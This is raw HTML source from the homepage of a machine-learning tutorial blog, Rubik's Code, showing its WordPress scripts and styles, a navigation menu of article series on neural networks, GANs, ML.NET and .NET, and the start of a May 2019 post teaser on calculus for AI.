d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dashicons.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='everest-forms-general-css' href='https://rubikscode.net/wp-content/plugins/everest-forms/assets/css/everest-forms.css?ver=1.4.8' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' id='fortune-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C700%2C900%2C300italic%2C400italic%2C700italic&#038;subset=latin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext&#038;display=swap' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://rubikscode.net/wp-content/themes/fortune/css/font-awesome.css?ver=4.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='fortune-css-framework-css' href='https://rubikscode.net/wp-content/themes/fortune/css/bootstrap.css?ver=3.3.1' type='text/css' media='all' /> <link rel='stylesheet' id='fortune-style-css' href='https://rubikscode.net/wp-content/themes/fortune/style.css?ver=1.5.0' type='text/css' media='all' /> <style id='fortune-style-inline-css' type='text/css'> .tags-links, .byline { clip: rect(1px, 1px, 1px, 1px); height: 1px; position: absolute; overflow: hidden; width: 1px; } </style> <link rel='stylesheet' id='fortune-print-style-css' href='https://rubikscode.net/wp-content/themes/fortune/css/print-style.css?ver=1.0.0' type='text/css' media='print' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/rubikscode.net","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://rubikscode.net/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/postmessage.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.jetpack-resize.min.js'></script> <link rel='https://api.w.org/' href='https://rubikscode.net/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://rubikscode.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://rubikscode.net/wp-includes/wlwmanifest.xml" /> <link rel='dns-prefetch' href='//widgets.wp.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <link rel='dns-prefetch' href='//jetpack.wordpress.com'/> <link rel='dns-prefetch' href='//s1.wp.com'/> <link rel='dns-prefetch' href='//s2.wp.com'/> <link rel='dns-prefetch' href='//public-api.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style> <!-- Site Logo: hide header text --> <style type="text/css"> .site-title, .site-description { position: absolute; clip: rect(1px, 1px, 1px, 1px); } </style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="Rubik&#039;s Code" /> <meta property="og:description" content="Machine Learning Without Tears" /> <meta property="og:url" content="https://rubikscode.net/" /> <meta property="og:site_name" content="Rubik&#039;s Code" /> <meta property="og:image" content="https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=488%2C488&amp;ssl=1" /> <meta property="og:image:width" content="488" /> <meta property="og:image:height" content="488" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:creator" content="@NMZivkovic" /> <!-- End Jetpack Open Graph Tags --> <style type="text/css" id="custom-colors-css">.sticky.hentry .entry-secondary-meta .comments-link,.hentry .entry-secondary-meta .comments-link{opacity:.5}.hentry .entry-secondary-meta .comments-link a{color:#fff}.sticky.hentry .entry-secondary-meta .comments-link a{color:#fff}body:not(.search) #page .jetpack-testimonial.hentry .entry-content,.jetpack-testimonial-shortcode .testimonial-entry-content{color:#fff}.sticky.hentry .entry-content a{color:#fff}.sticky.hentry .entry-content a{border-bottom-color:#fff}body{background-color:#fff}a,.navigation.paging-navigation a.previous-link,.navigation.paging-navigation a.next-link,#site-navigation li:hover>a,.homepage-widgets .widget .widget-title{color:#b64f00}#site-navigation ul ul,#site-navigation .current_page_item>a,#site-navigation .current-menu-item>a,#site-navigation .current_page_ancestor>a,#site-navigation .current_page_item>a:hover,#site-navigation .current-menu-item>a:hover,#site-navigation .current_page_ancestor>a:hover,#site-navigation ul:not(.sub-menu)>.menu-item-has-children:hover>a:hover,#site-navigation ul:not(.sub-menu)>.menu-item-has-children:hover>a{background:#b64f00}.widget_tag_cloud a,.hentry .entry-secondary-meta .post-date,.blog .hentry.format-link .hentry-inner,.archive .hentry.format-link .hentry-inner,body:not(.search) #page .jetpack-testimonial.hentry .entry-content,.jetpack-testimonial-shortcode .testimonial-entry-content,.widget_tag_cloud a,.wp_widget_tag_cloud a{background:#b64f00}input[type="submit"],#masthead .header-searchform button.submit{background:#b64f00}blockquote{border-color:#b64f00}#comments .comment-list .bypostauthor article{border-left-color:#b64f00}#colophon #gotop-button a{background:#b64f00}#colophon{border-color:#b64f00}.hentry .entry-secondary-meta .comments-link{background:#be5402}a:hover{color:#5a2700}.hentry .entry-content a,.hentry .more-link-container a.more-link{border-bottom-color:#8d3e01}.sticky.hentry .entry-secondary-meta .post-date{background:#7f6e00}.sticky.hentry .entry-secondary-meta .comments-link{background:#7f6e00}</style> <link rel="icon" href="https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i2.wp.com/rubikscode.net/wp-content/uploads/2018/11/cropped-RC-logo-2.png?fit=270%2C270&#038;ssl=1" /> <style type="text/css" id="wp-custom-css"> .site-title .logo { max-width: 100% !important; max-height: 225px !important; } </style> </head> <body class="home blog everest-forms-no-js hfeed has-sidebar custom-colors has-site-logo tags-hidden author-hidden"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header" role="banner"> <div class="top-bar"> <div class="container clearfix"> <nav class="pull-right header-social social-list" role="navigation" aria-label="Social navigation"> <ul id="menu-social-media" class="menu-items list-unstyled clearfix"><li id="menu-item-12" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12"><a href="https://www.linkedin.com/in/nmzivkovic/"><span class="screen-reader-text social-meta">LinkedIn</span></a></li> <li id="menu-item-13" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13"><a href="https://twitter.com/NMZivkovic?lang=en"><span class="screen-reader-text social-meta">Twitter</span></a></li> <li id="menu-item-8042" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8042"><a href="https://www.facebook.com/rubikscodenet/"><span class="screen-reader-text social-meta">FB</span></a></li> <li id="menu-item-5483" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5483"><a href="https://github.com/NMZivkovic"><span class="screen-reader-text social-meta">Git</span></a></li> </ul> </nav><!-- .social-list --> </div><!-- .container --> </div><!-- .top-bar --> <div id="header-inner"> <div class="container clearfix site-header-inner"> <div class="site-branding pull-left"> <a href="https://rubikscode.net/" class="site-logo-link" rel="home" itemprop="url"><img width="155" height="74" src="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/3-1.png?fit=155%2C74&amp;ssl=1" class="site-logo attachment-full" alt="" data-size="full" itemprop="logo" data-attachment-id="9253" data-permalink="https://rubikscode.net/3-18/" data-orig-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/3-1.png?fit=155%2C74&amp;ssl=1" data-orig-size="155,74" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="3" data-image-description="" data-medium-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/3-1.png?fit=155%2C74&amp;ssl=1" data-large-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/3-1.png?fit=155%2C74&amp;ssl=1" /></a> <h1 class="site-title"><a href="https://rubikscode.net/" rel="home">Rubik&#039;s Code</a></h1> <p class="site-description">Machine Learning Without Tears</p> </div><!-- .site-branding --> <div class="pull-right main-header-links"> <nav id="site-navigation" class="main-navigation menu-navigation" role="navigation" aria-label="Primary navigation"> <ul id="menu-primary" class="nav-bar"><li id="menu-item-8085" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8085"><a>Products</a> <ul class="sub-menu"> <li id="menu-item-8084" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8084"><a href="https://www.packtpub.com/application-development/introducing-test-driven-development-c-video">Introducing Test Driven Development in C# &#8211; Video Course</a></li> <li id="menu-item-8318" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8318"><a href="https://www.packtpub.com/application-development/test-driven-development-c-and-net-core-mvc-video">Test Driven Development with C# and .NET Core MVC &#8211; Video Course</a></li> <li id="menu-item-8441" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8441"><a href="https://www.packtpub.com/big-data-and-business-intelligence/real-world-machine-learning-projects-scikit-learn-video">Real-World Machine Learning Projects with Sci-Kit Learn</a></li> </ul> </li> <li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-8"><a href="/" aria-current="page">Articles</a></li> <li id="menu-item-7433" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-7433"><a href="https://rubikscode.net/category/series/">Series</a> <ul class="sub-menu"> <li id="menu-item-8100" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-has-children menu-item-8100"><a href="https://rubikscode.net/2018/02/19/artificial-neural-networks-series/">Artificial Neural Networks Series</a> <ul class="sub-menu"> <li id="menu-item-8099" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8099"><a href="https://rubikscode.net/2017/11/13/introduction-to-artificial-neural-networks/">Introduction to Artificial Neural Networks</a></li> <li id="menu-item-8098" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8098"><a href="https://rubikscode.net/2017/11/20/common-neural-network-activation-functions/">Common Neural Network Activation Functions</a></li> <li id="menu-item-8097" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8097"><a href="https://rubikscode.net/2018/01/15/how-artificial-neural-networks-learn/">How do Artificial Neural Networks learn?</a></li> <li id="menu-item-8096" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8096"><a href="https://rubikscode.net/2018/01/22/backpropagation-algorithm-in-artificial-neural-networks/">Backpropagation Algorithm in Artificial Neural Networks</a></li> <li id="menu-item-8095" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8095"><a href="https://rubikscode.net/2018/01/29/implementing-simple-neural-network-in-c/">Implementing Simple Neural Network in C#</a></li> <li id="menu-item-8094" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8094"><a href="https://rubikscode.net/2018/02/05/introduction-to-tensorflow-with-python-example/">Introduction to TensorFlow – With Python Example</a></li> <li id="menu-item-8093" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8093"><a href="https://rubikscode.net/2018/02/12/implementing-simple-neural-network-using-keras-with-python-example/">Implementing Simple Neural Network using Keras – With Python Example</a></li> <li id="menu-item-8092" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8092"><a href="https://rubikscode.net/2018/02/26/introduction-to-convolutional-neural-networks/">Introduction to Convolutional Neural Networks</a></li> <li id="menu-item-8091" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8091"><a href="https://rubikscode.net/2018/03/05/implementation-of-convolutional-neural-network-using-python-and-keras/">Implementation of Convolutional Neural Network using Python and Keras</a></li> <li id="menu-item-8090" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8090"><a href="https://rubikscode.net/2018/03/12/introuduction-to-recurrent-neural-networks/">Introduction to Recurrent Neural Networks</a></li> <li id="menu-item-8089" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8089"><a href="https://rubikscode.net/2018/03/19/understanding-long-short-term-memory-networks-lstms/">Understanding Long Short-Term Memory Networks (LSTMs)</a></li> <li id="menu-item-8088" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8088"><a href="https://rubikscode.net/2018/03/26/two-ways-to-implement-lstm-network-using-python-with-tensorflow-and-keras/">Two Ways to Implement LSTM Network using Python – with TensorFlow and Keras</a></li> </ul> </li> <li id="menu-item-8951" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8951"><a href="http://rtrtr.com">GAN Series</a> <ul class="sub-menu"> <li id="menu-item-8957" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8957"><a href="https://rubikscode.net/2018/12/10/introduction-to-generative-adversarial-networks-gans/">Introduction to Generative Adversarial Networks (GANs)</a></li> <li id="menu-item-8956" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8956"><a href="https://rubikscode.net/2018/12/17/implementing-gan-dcgan-with-python/">Implementing GAN &#038; DCGAN with Python</a></li> <li id="menu-item-8955" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8955"><a href="https://rubikscode.net/2019/01/14/introduction-to-adversarial-autoencoders/">Introduction to Adversarial Autoencoders</a></li> <li id="menu-item-8954" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8954"><a href="https://rubikscode.net/2019/01/21/generating-images-using-adversarial-autoencoders-and-python/">Generating Images using Adversarial Autoencoders and Python</a></li> <li id="menu-item-8952" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8952"><a href="https://rubikscode.net/2019/02/11/implementing-cyclegan-using-python/">Implementing CycleGAN Using Python</a></li> <li id="menu-item-8953" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8953"><a href="https://rubikscode.net/2019/02/04/introduction-to-cyclegan/">Introduction to CycleGAN</a></li> </ul> </li> <li id="menu-item-8360" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8360"><a href="https://rubikscode.net/2018/07/23/machine-learning-with-ml-net-series/">Machine Learning with ML.NET</a> <ul class="sub-menu"> <li id="menu-item-8958" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8958"><a href="https://rubikscode.net/2019/02/18/ultimate-guide-to-machine-learning-with-ml-net/">Ultimate Guide to Machine Learning with ML.NET</a></li> <li id="menu-item-8364" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8364"><a href="https://rubikscode.net/2018/06/18/using-ml-net-introduction-to-machine-learning-and-ml-net/">Using ML.NET – Introduction to Machine Learning and ML.NET</a></li> <li id="menu-item-8363" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8363"><a href="https://rubikscode.net/2018/06/25/machine-learning-with-ml-net-solving-real-world-regression-problem-bike-sharing-demands/">Machine Learning with ML.NET – Solving Real-World Regression Problem (Bike Sharing Demands)</a></li> <li id="menu-item-8362" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8362"><a href="https://rubikscode.net/2018/07/02/machine-learning-with-ml-net-solving-real-world-classification-problem-wine-quality/">Machine Learning with ML.NET – Solving Real-World Classification Problem (Wine Quality)</a></li> <li id="menu-item-8361" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8361"><a href="https://rubikscode.net/2018/07/09/machine-learning-in-ml-net-using-machine-learning-model-in-asp-net-mvc-application/">Machine Learning in ML.NET – Using Machine Learning Model in ASP.NET Core Application</a></li> <li id="menu-item-8380" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8380"><a href="https://rubikscode.net/2018/07/16/machine-learning-with-ml-net-comparing-data-exploration-in-python-with-data-exploration-in-ml-net/">Machine Learning with ML.NET – Comparing Data Exploration in Python with Data Exploration in ML.NET</a></li> </ul> </li> <li id="menu-item-8426" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-has-children menu-item-8426"><a href="https://rubikscode.net/2018/08/06/asynchronous-programming-in-net/">Asynchronous Programming in .NET</a> <ul class="sub-menu"> <li id="menu-item-8299" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8299"><a href="https://rubikscode.net/2018/05/21/asynchronous-programming-in-net-motivation-and-unit-testing/">Motivation and Unit Testing</a></li> <li id="menu-item-8298" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8298"><a href="https://rubikscode.net/2018/05/28/asynchronous-programming-in-net-common-mistakes-and-best-practices/">Common Mistakes and Best Practices</a></li> <li id="menu-item-8297" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8297"><a href="https://rubikscode.net/2018/06/04/asynchronous-programming-in-net-task-based-asynchronous-pattern-tap/">Task-based Asynchronous Pattern (TAP)</a></li> <li id="menu-item-8313" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8313"><a href="https://rubikscode.net/2018/06/11/asynchronous-programming-in-net-benefits-and-tradeoffs-of-using-valuetask/">Benefits and Tradeoffs of Using ValueTask<T></a></li> </ul> </li> <li id="menu-item-8481" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-has-children menu-item-8481"><a href="https://rubikscode.net/2018/09/26/self-organizing-maps-series/">Self- Organizing Maps Series</a> <ul class="sub-menu"> <li id="menu-item-8485" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8485"><a href="https://rubikscode.net/2018/08/20/introduction-to-self-organizing-maps/">Introduction to Self-Organizing Maps</a></li> <li id="menu-item-8484" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8484"><a href="https://rubikscode.net/2018/08/27/implementing-self-organizing-maps-with-python-and-tensorflow/">Implementing Self-Organizing Maps with Python and TensorFlow</a></li> <li id="menu-item-8483" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8483"><a href="https://rubikscode.net/2018/09/17/implementing-self-organizing-maps-with-net-core/">Implementing Self-Organizing Maps with .NET Core</a></li> <li id="menu-item-8482" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8482"><a href="https://rubikscode.net/2018/09/24/credit-card-fraud-detection-using-self-organizing-maps-and-python/">Credit Card Fraud Detection Using Self-Organizing Maps and Python</a></li> </ul> </li> <li id="menu-item-8748" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-has-children menu-item-8748"><a href="https://rubikscode.net/2019/01/07/restricted-boltzmann-machine-series/">Restricted Boltzmann Machine Series</a> <ul class="sub-menu"> <li id="menu-item-8565" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8565"><a href="https://rubikscode.net/2018/10/01/introduction-to-restricted-boltzmann-machines/">Introduction to Restricted Boltzmann Machines</a></li> <li id="menu-item-8563" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8563"><a href="https://rubikscode.net/2018/10/22/implementing-restricted-boltzmann-machine-with-python-and-tensorflow/">Implementing Restricted Boltzmann Machine with Python and TensorFlow</a></li> <li id="menu-item-8564" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8564"><a href="https://rubikscode.net/2018/10/15/implementing-restricted-boltzmann-machine-with-net-core/">Implementing Restricted Boltzmann Machine with .NET Core</a></li> <li id="menu-item-8562" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8562"><a href="https://rubikscode.net/2018/11/12/generate-music-using-tensorflow-and-python/">Generate Music Using TensorFlow and Python</a></li> </ul> </li> <li id="menu-item-8104" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-has-children menu-item-8104"><a href="https://rubikscode.net/2017/10/16/mongodb-serial/">MongoDB Series</a> <ul class="sub-menu"> <li id="menu-item-8107" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8107"><a href="https://rubikscode.net/2017/07/19/introduction-to-nosql-and-polyglot-persistence/">Introduction to NoSQL and Polyglot Persistence</a></li> <li id="menu-item-8103" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8103"><a href="https://rubikscode.net/2017/07/24/mongo-db-basics-part-1/">MongoDB Basics – part 1.</a></li> <li id="menu-item-8102" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8102"><a href="https://rubikscode.net/2017/07/31/mongo-db-basics-part-2/">Mongo DB Basics – part 2.</a></li> <li id="menu-item-8106" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8106"><a href="https://rubikscode.net/2017/10/02/using-mongodb-in-c/">Using MongoDB in C#</a></li> <li id="menu-item-8101" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8101"><a href="https://rubikscode.net/2017/10/09/mean-stack-crash-course-using-mongodb-with-node-js-express-and-angular-4/">MEAN Stack Crash Course – Using MongoDB with Node.js, Express and Angular 4</a></li> <li id="menu-item-8105" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8105"><a href="https://rubikscode.net/2017/10/15/serverless-and-mongodb-atlas/">Serverless and Playing Around With MongoDB Atlas</a></li> </ul> </li> <li id="menu-item-8221" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-has-children menu-item-8221"><a href="https://rubikscode.net/2018/04/30/philosophy-as-motivational-tool-for-software-crafters-series/">Philosophy as Motivational Tool for Software Crafters Series</a> <ul class="sub-menu"> <li id="menu-item-8225" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8225"><a href="https://rubikscode.net/2018/04/23/how-to-use-miyamoto-musashis-philosophy-to-become-better-software-crafter/">How to use Miyamoto Musashi&#8217;s Philosophy to Become Better Software Crafter</a></li> <li id="menu-item-8223" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8223"><a href="https://rubikscode.net/2017/11/06/how-to-use-marcus-aureliuss-meditations-to-become-better-software-craftsman/">How to use Marcus Aurelius&#8217;s Meditations to Become Better Software Crafter</a></li> <li id="menu-item-8224" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8224"><a href="https://rubikscode.net/2017/06/22/%ef%bb%bfhow-to-use-friedrich-nietzsches-philosophy-to-be-better-software-craftsman/">How to use Friedrich Nietzsche&#8217;s philosophy to be better Software Crafter</a></li> <li id="menu-item-8222" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8222"><a href="https://rubikscode.net/2017/05/14/how-to-use-art-of-war-to-be-better-software-craftsman/">How to use &#8220;Art of War&#8221; to be better Software Crafter</a></li> </ul> </li> </ul> </li> <li id="menu-item-8188" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8188"><a>Categories</a> <ul class="sub-menu"> <li id="menu-item-8189" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8189"><a href="https://rubikscode.net/category/ai/">AI</a></li> <li id="menu-item-8365" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8365"><a href="https://rubikscode.net/category/machine-learning/">Machine Learning</a></li> <li id="menu-item-8190" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8190"><a href="https://rubikscode.net/category/net/">.NET</a></li> <li id="menu-item-8464" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8464"><a href="https://rubikscode.net/category/python/">Python</a></li> <li id="menu-item-8191" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8191"><a href="https://rubikscode.net/category/nosql/">NoSQL</a></li> </ul> </li> <li id="menu-item-882" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-882"><a href="https://rubikscode.net/about/">About</a></li> <li id="menu-item-10" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10"><a href="https://rubikscode.net/contact/">Contact</a></li> </ul> </nav><!-- #site-navigation --> <button id="toggle-mobile-menu" class="toggle-mobile-menu has-icon clean-button has-border-radius" type="button" aria-expanded="false"> Menu </button><!-- .toggle-mobile-menu --> <div class="header-search-container has-border-radius"> <button id="header-search-button" class="header-search-button has-icon clean-button" type="button" aria-expanded="false"> <span class="open-label screen-reader-text">Open a search box</span> <span class="close-label screen-reader-text">Close a search box</span> </button> <form method="get" id="header-searchform" class="header-searchform has-border-radius" action="https://rubikscode.net/" role="search"> <label for="header-search-input"> <span class="screen-reader-text">Search for:</span> <input type="text" id="header-search-input" class="field" placeholder="Search..." name="s" value="" /> </label> <button type="submit" class="submit has-border-radius clean-button"> <i class="fa fa-search" aria-hidden="true"></i> <span class="screen-reader-text">Search</span> </button> </form><!-- .header-searchform --> </div><!-- .header-search-container --> </div><!-- .main-header-links --> </div><!-- .container --> </div><!-- #header-inner --> <nav id="mobile-navigation" class="mobile-navigation" role="navigation" aria-label="Mobile navigation" aria-hidden="true"> <div class="container"></div> </nav><!-- .mobile-navigation --> </header><!-- #masthead --> <div id="content" class="site-content"> <div class="container"> <div class="row"> <div id="primary" class="content-area col-lg-8 col-md-8"> <main id="main" class="site-main" role="main"> <article id="post-9242" class="post-9242 post type-post status-publish format-standard has-post-thumbnail hentry category-ai category-machine-learning tag-ai tag-artificaial-inteligance tag-artificial-intelligence tag-artificial-neural-networks tag-deep-learning tag-machine-learning tag-math tag-mathematics tag-neural-networks tag-software tag-software-craft tag-software-craftsmanship tag-software-development"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/05/13/mathematics-for-artificial-intelligence-calculus-optimization/"><span class="day" aria-hidden="true">13</span><span class="month" aria-hidden="true">May</span><time class="screen-reader-text" datetime="2019-05-13T08:30:10+02:00">May 13, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/05/13/mathematics-for-artificial-intelligence-calculus-optimization/#comments">5<span class="screen-reader-text"> comments on &ldquo;Mathematics for Artificial Intelligence – Calculus &#038; Optimization&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/05/13/mathematics-for-artificial-intelligence-calculus-optimization/" rel="bookmark">Mathematics for Artificial Intelligence – Calculus &#038; Optimization</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/ai/" rel="category tag">AI</a>, <a href="https://rubikscode.net/category/machine-learning/" rel="category tag">Machine Learning</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/05/13/mathematics-for-artificial-intelligence-calculus-optimization/" class="thumb-link"> <img width="760" height="300" src="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/05/Calculus.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/05/Calculus.png?resize=760%2C300&amp;ssl=1 760w, 